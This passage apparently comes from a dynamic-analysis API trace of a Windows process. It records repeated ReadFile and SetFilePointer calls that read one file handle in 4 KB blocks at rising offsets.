hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.131] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x62000 [0081.132] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.132] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x63000 [0081.132] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.133] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x64000 [0081.133] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.133] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x65000 [0081.133] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.134] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x66000 [0081.134] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.134] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x67000 [0081.134] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.135] SetFilePointer (in: 
hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x68000 [0081.135] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.135] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x69000 [0081.135] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.136] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x6a000 [0081.136] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.137] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x6b000 [0081.137] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.137] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x6c000 [0081.137] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 
[0081.137] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x6d000 [0081.138] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.138] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x6e000 [0081.138] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.138] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x6f000 [0081.139] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.139] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x70000 [0081.139] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.139] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x71000 [0081.139] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, 
lpOverlapped=0x0) returned 1 [0081.141] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x72000 [0081.141] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.141] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x73000 [0081.141] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.141] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x74000 [0081.142] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.142] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x75000 [0081.142] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.142] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x76000 [0081.143] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, 
lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.143] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x77000 [0081.143] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.143] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x78000 [0081.143] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.144] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x79000 [0081.144] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.145] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x7a000 [0081.145] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.145] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x7b000 [0081.145] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | 
out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.146] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x7c000 [0081.146] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.146] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x7d000 [0081.146] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.147] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x7e000 [0081.147] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.147] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x7f000 [0081.147] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.148] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x80000 [0081.148] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, 
lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.150] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x81000 [0081.151] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.151] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x82000 [0081.151] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.152] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x83000 [0081.152] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.152] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x84000 [0081.152] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.152] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x85000 [0081.153] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, 
nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.153] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x86000 [0081.153] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.153] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x87000 [0081.153] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.154] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x88000 [0081.154] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.155] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x89000 [0081.155] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.155] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x8a000 [0081.155] ReadFile (in: 
hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.156] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x8b000 [0081.156] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.156] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x8c000 [0081.156] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.156] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x8d000 [0081.156] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.157] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x8e000 [0081.157] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.157] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x8f000 
[0081.157] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.157] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x90000 [0081.157] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.159] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x91000 [0081.159] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.159] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x92000 [0081.159] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.159] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x93000 [0081.159] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.160] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x94000 [0081.160] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.160] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x95000 [0081.160] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.161] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x96000 [0081.161] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.161] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x97000 [0081.161] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.162] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x98000 [0081.162] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, 